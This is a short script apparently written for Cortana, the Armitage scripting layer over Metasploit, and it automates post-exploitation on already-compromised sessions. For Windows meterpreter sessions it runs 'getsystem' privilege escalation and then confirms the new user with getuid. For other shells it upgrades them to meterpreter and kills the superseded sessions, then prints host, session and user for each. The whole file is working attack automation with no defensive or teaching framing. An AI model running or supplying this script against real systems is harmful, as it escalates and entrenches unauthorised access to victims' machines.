debug(7);

on ready {
   println("ready");
}

command arguments {
   local('@sessions');
   @sessions = split(';', $1);
   println("arguments");
   fire_event_local("manageSessions", @sessions)
}

on manageSessions {
   println("privileges");
   local('$console $session @info @sessions');
   $console = console();

   on("console", $this);

   foreach $session ($1) {
      @info = split(',', $session);
      println(@info);
      if (@info[1] eq "windows") {
         m_cmd(@info[0], "get priv");
         sleep(1000);
         m_cmd(@info[0], "getsystem");
         sleep(3000);
      }
      else {
         println("else");
         cmd($console, "jobs -K");
         cmd($console, "sessions -u @info[0] ");
         yield;
      }
   }
   #sleep(30000);
   fire_event_local("checkNewPrivileges", $1);
}

on checkNewPrivileges {
   local('$session @info');

   foreach $session ($1) {
      @info = split(',', $session);
      if (@info[1] eq "windows") {
         m_cmd(@info[0], "getuid");
         sleep(2000);
      }
   }
   fire_event_local("getNewSessions", $1);
}

on getNewSessions {
   local('$console %out @ids $sessionNum $host $user %r $exploit $type $session @info $close');
   
   @ids = session_ids();
   %out = sessions();
   $console = console();

   cmd($console, "jobs -K");   

   foreach $sessionNum (@ids) {
      %r = %out[$sessionNum];
      $host = %r["host"];
      $type = %r["type"];
      $user = %r["username"];

      foreach $session ($1) {
         @info = split(',', $session);
         $close = @info[0];
         if (@info[2] eq $host && @info[1] eq "linux") {
            if ($sessionNum > @info[0]) {
               println("$host" . "," . "$sessionNum" . "," . "$user");
               cmd($console, "sessions -k $close ");
            }
         }
      }
   }
   sleep(3000);
   quit();
}

on meterpreter_getuid {
   local('%out %r $host $user');

   %out = sessions();
   %r = %out[$1];
   $host = %r["host"];
   $user = %r["username"];

   println("$host" . "," . "$1" . "," . "$user");
}